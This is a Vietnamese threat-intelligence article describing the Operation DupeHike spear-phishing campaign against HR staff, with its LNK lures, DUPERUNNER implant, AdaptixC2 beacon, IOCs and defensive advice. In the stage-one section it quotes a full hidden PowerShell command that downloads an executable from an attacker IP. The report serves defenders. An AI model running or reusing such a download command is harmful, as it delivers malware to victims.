Chiến dịch tấn công mạng tinh vi mang tên Operation DupeHike đang nổi lên như một mối đe dọa đáng kể đối với các môi trường doanh nghiệp, đặc biệt nhắm vào nhân viên trong các phòng ban nhân sự (HR), tính lương và hành chính. Chiến dịch này sử dụng các tài liệu nhử mồi được thiết kế tỉ mỉ, lấy chủ đề về tiền thưởng nhân viên và các chính sách tài chính nội bộ, nhằm phát tán một hệ sinh thái mã độc mới chưa từng được biết đến trước đây tới máy tính của nạn nhân.

Operation DupeHike: Mục Tiêu và Kỹ Thuật Xâm Nhập Ban Đầu

Chiến dịch được các nhà nghiên cứu bảo mật tại Seqrite xác định sau khi phát hiện một tệp ZIP độc hại trên VirusTotal vào ngày 21 tháng 11 năm 2025. Phân tích cho thấy thủ phạm đã thể hiện sự hiểu biết sâu sắc về quy trình làm việc nhân sự của các doanh nghiệp, tạo ra các tài liệu giả mạo mô tả cấu trúc tiền thưởng thực tế, gắn liền với các chỉ số hiệu suất (KPI) và mục tiêu tổ chức.

Phạm Vi và Mục Tiêu Cụ Thể

• Mục tiêu chính: Nhân viên phòng ban HR, tính lương và hành chính trong các môi trường doanh nghiệp.
• Tài liệu nhử mồi: Các tài liệu liên quan đến tiền thưởng và chính sách tài chính nội bộ.
• Chi tiết nhử mồi: Tài liệu tham chiếu đến Bộ luật Lao động của Nga và thiết lập mức thưởng mặc định là mười lăm phần trăm của lương hàng năm, tạo ra nội dung lừa đảo xã hội (social engineering) rất thuyết phục.

Kỹ Thuật Phát Tán Ban Đầu

Cuộc tấn công mạng bắt đầu bằng các email lừa đảo spear-phishing chứa các tệp nén ZIP được ngụy trang thành tài liệu công ty hợp pháp. Các tệp ZIP này có tên như “Премия 2025.zip” (Bonus.Zip) và chứa các tệp phím tắt độc hại (.LNK). Các tệp .LNK này được ngụy trang thành tài liệu PDF, sử dụng các tên tệp như “Document_1_On_the_size_of_the_annual_bonus.pdf.lnk” để lừa người nhận mở chúng.

Chuỗi Tấn Công Kỹ Thuật Qua Ba Giai Đoạn

Chuỗi tấn công của Operation DupeHike hoạt động qua ba giai đoạn riêng biệt, mỗi giai đoạn được thiết kế để vượt qua các biện pháp bảo mật và duy trì sự hiện diện trên hệ thống mục tiêu. Đây là một mối đe dọa mạng phức tạp đòi hỏi sự cảnh giác cao độ.

Giai Đoạn 1: Thực Thi Mã Độc Qua LNK và PowerShell

Khi nạn nhân mở tệp phím tắt .LNK độc hại, một lệnh PowerShell sẽ được thực thi ẩn trong nền. Lệnh này sử dụng các tham số cụ thể như NoNI (No New-Item), nop (NoProfile), và w hidden để giảm thiểu khả năng bị phát hiện. Mục đích chính của script PowerShell này là tải về giai đoạn tiếp theo của mã độc.

powershell -NoNI -nop -w hidden -c "Invoke-WebRequest -Uri hxxp://46.149.71.230/DUPERUNNER -OutFile $env:TEMPDUPERUNNER.exe"

Giai Đoạn 2: Triển Khai DUPERUNNER – Implant Reconnaissance và Persistence

Sau khi được tải về, mã độc giai đoạn hai, được gọi là DUPERUNNER, sẽ được thực thi. Đây là một implant được biên dịch bằng C++, thực hiện các hoạt động trinh sát và tiêm nhiễm quan trọng vào hệ thống. DUPERUNNER được thiết kế với nhiều chức năng để duy trì sự bền bỉ (persistence) trên hệ thống và né tránh sự phát hiện của các giải pháp bảo mật.

Chức Năng Chính của DUPERUNNER:

• Liệt kê tiến trình: Mã độc liệt kê các tiến trình mục tiêu bao gồm explorer.exe, notepad.exe, và msedge.exe để chuẩn bị cho việc tiêm mã độc.
• Hiển thị tài liệu giả mạo: Đồng thời, DUPERUNNER tải về các tệp PDF giả mạo và hiển thị chúng cho người dùng. Điều này tạo ra ảo giác về một quá trình xử lý tài liệu hợp pháp, khiến nạn nhân ít nghi ngờ hơn về hoạt động độc hại đang diễn ra trong nền.

Hoạt động này cho phép kẻ tấn công tiến hành trinh sát hệ thống, thu thập thông tin cần thiết về môi trường hoạt động và chuẩn bị cho việc tải payload cuối cùng. Địa chỉ máy chủ kiểm soát (C2) ban đầu để tải DUPERUNNER là 46.149.71.230.

Giai Đoạn 3: Kích Hoạt Beacon AdaptixC2 và Chiếm Quyền Điều Khiển

Sau khi DUPERUNNER hoàn tất các hoạt động trinh sát, implant này thực hiện kỹ thuật tiêm luồng từ xa (remote thread injection) để tải payload cuối cùng: một beacon AdaptixC2. Beacon này là một công cụ chiếm quyền điều khiển (Command and Control – C2) cho phép kẻ tấn công thực thi lệnh từ xa và đánh cắp dữ liệu từ hệ thống bị xâm nhập.

Đặc Điểm Kỹ Thuật của AdaptixC2:

• Giao tiếp C2: AdaptixC2 sử dụng các yêu cầu HTTP POST để giao tiếp với hạ tầng của kẻ tấn công.
• Né tránh phát hiện: Beacon sử dụng kỹ thuật phân giải API động (dynamic API resolution) thông qua hashing kiểu djb2 để tránh các chữ ký phát hiện tĩnh. Điều này khiến việc phát hiện và phân tích mã độc trở nên khó khăn hơn đối với các hệ thống bảo mật truyền thống.
• Hạ tầng C2: Các nhà nghiên cứu của Seqrite đã trích xuất các cấu hình, tiết lộ ID beacon và hạ tầng C2 được lưu trữ trên các máy chủ thuộc ASN 48282 và AS 9123, do VDSINA-AS và TIMEWEB-AS vận hành.
• Thay đổi cấu hình cổng: Hạ tầng này cho thấy sự thay đổi cấu hình cổng từ cổng 80 trong quá trình phân phối implant sang cổng 443 cho các hoạt động beacon cuối cùng, cho thấy sự tinh chỉnh liên tục của hạ tầng tấn công.

Việc sử dụng AdaptixC2 cho phép kẻ tấn công duy trì sự kiểm soát liên tục, thực hiện các lệnh tùy ý và tiến hành các hoạt động exfiltration dữ liệu một cách bí mật.

Các Chỉ Số Thỏa Hiệp (Indicators of Compromise – IOCs)

Dưới đây là các chỉ số thỏa hiệp quan trọng liên quan đến chiến dịch Operation DupeHike, có thể được sử dụng để phát hiện và ngăn chặn xâm nhập mạng:

• Tên tệp ZIP độc hại:
  • Премия 2025.zip
  • Bonus.zip (tên tiếng Anh tương đương)
• Tên tệp LNK độc hại:
  • Document_1_On_the_size_of_the_annual_bonus.pdf.lnk
• Địa chỉ IP máy chủ C2 (tải DUPERUNNER):
  • 46.149.71.230
• Số hiệu hệ thống tự trị (ASN) của hạ tầng C2 (AdaptixC2):
  • ASN 48282 (VDSINA-AS)
  • AS 9123 (TIMEWEB-AS)
• Mã độc được sử dụng:
  • DUPERUNNER (C++ compiled implant)
  • AdaptixC2 (Command and Control beacon)

Phòng Ngừa và Phát Hiện Mối Đe Dọa Nâng Cao

Để bảo vệ các tổ chức khỏi các chiến dịch tấn công mạng như Operation DupeHike, cần triển khai một chiến lược an ninh mạng toàn diện. Sự kết hợp giữa kỹ thuật xã hội tinh vi và mã độc tiên tiến đặt ra yêu cầu cao về khả năng phòng thủ.

Các Biện Pháp Phòng Ngừa Chính

• Đào tạo nhận thức về bảo mật: Huấn luyện nhân viên, đặc biệt là các phòng ban HR và tài chính, về các dấu hiệu của email spear-phishing, cách nhận diện tệp đính kèm và liên kết đáng ngờ. Nhấn mạnh việc kiểm tra kỹ tên tệp và phần mở rộng (ví dụ: .lnk thay vì .pdf).
• Giải pháp bảo mật email: Triển khai các hệ thống bảo mật email mạnh mẽ có khả năng phát hiện và chặn các email lừa đảo, tệp đính kèm độc hại và các liên kết nguy hiểm.
• Quản lý bản vá và cập nhật: Đảm bảo tất cả hệ điều hành, ứng dụng và phần mềm bảo mật được cập nhật bản vá lỗi mới nhất để giảm thiểu các lỗ hổng có thể bị khai thác.
• Giải pháp bảo mật điểm cuối (EDR/XDR): Sử dụng các giải pháp Endpoint Detection and Response (EDR) hoặc Extended Detection and Response (XDR) để giám sát hoạt động điểm cuối, phát hiện các hành vi bất thường như thực thi PowerShell ẩn, tiêm luồng và giao tiếp C2 không mong muốn. Theo phân tích của Seqrite, các hành vi này là dấu hiệu rõ ràng của cuộc tấn công.

Chiến Lược Phát Hiện và Ứng Phó

• Giám sát mạng và lưu lượng C2: Giám sát lưu lượng mạng để phát hiện các kết nối đến các địa chỉ IP hoặc ASN độc hại đã biết. Đặc biệt chú ý đến các kết nối HTTP POST bất thường đến các máy chủ C2.
• Phân tích hành vi: Triển khai các công cụ phân tích hành vi người dùng và thực thể (UEBA) để phát hiện các hoạt động bất thường của tài khoản người dùng hoặc hệ thống có thể chỉ ra một sự xâm nhập mạng.
• Phân đoạn mạng: Áp dụng chính sách phân đoạn mạng để hạn chế sự lây lan của mã độc trong trường hợp một hệ thống bị xâm nhập.
• Sao lưu dữ liệu định kỳ: Thực hiện sao lưu dữ liệu quan trọng một cách thường xuyên và đảm bảo khả năng khôi phục nhanh chóng để giảm thiểu tác động của một cuộc tấn công thành công.

Các tổ chức cần liên tục đánh giá và củng cố chiến lược an ninh mạng của mình để đối phó hiệu quả với các chiến dịch tấn công mạng ngày càng phức tạp.